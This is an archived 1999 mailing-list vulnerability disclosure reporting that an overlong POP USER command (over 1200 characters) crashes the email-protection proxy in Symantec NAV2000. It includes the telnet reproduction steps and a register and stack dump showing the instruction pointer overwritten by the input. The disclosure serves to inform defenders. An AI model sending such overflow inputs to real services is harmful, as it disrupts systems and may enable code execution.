NAV2000 Email Protection DoS

From: kyleat_private
Date: Fri Dec 17 1999 - 08:34:07 PST

Next message: Jarle Aase: "Statement: Local / Remote D.o.S Attack in War FTP Daemon 1.70"

Previous message: Maurycy Prodeus: "Re: [lucidat_private: qpop3.0b20 and below - notes and"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello, I just found somewhat of a problem in Symantec's Email protection
in NAV2000.

The Protection program leaves a pop server running on the local
workstation NAV2000 is installed on.. This server can be crashed somewhat
like this
telnet 1.1.1.1
USER (over 1200 char)

Then, GPF in windows98
POPROXY caused an invalid page fault in
module <unknown> at 0000:31393837.
Registers:
EAX=02bcfcbc CS=017f EIP=31393837 EFLGS=00010246
EBX=02bcfcbc SS=0187 ESP=02ad001c EBP=02ad003c
ECX=02ad00c0 DS=0187 ESI=817538c0 FS=4fbf
EDX=bff76855 ES=0187 EDI=02ad00e8 GS=0000
Bytes at CS:EIP:

Stack dump:
bff76849 02ad00e8 02bcfcbc 02ad0104 02ad00c0 02ad01f4 bff76855 02bcfcbc
02ad00d0 bff87fe9 02ad00e8 02bcfcbc 02ad0104 02ad00c0 31393837 02ad02ac

In the time after the crash user must reboot to regain email function on
Workstation


This as been tested on 3 Machines Win98 SE Win95 rev B and Win95 rev C

Next message: Jarle Aase: "Statement: Local / Remote D.o.S Attack in War FTP Daemon 1.70"
Previous message: Maurycy Prodeus: "Re: [lucidat_private: qpop3.0b20 and below - notes and"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:21:47 PDT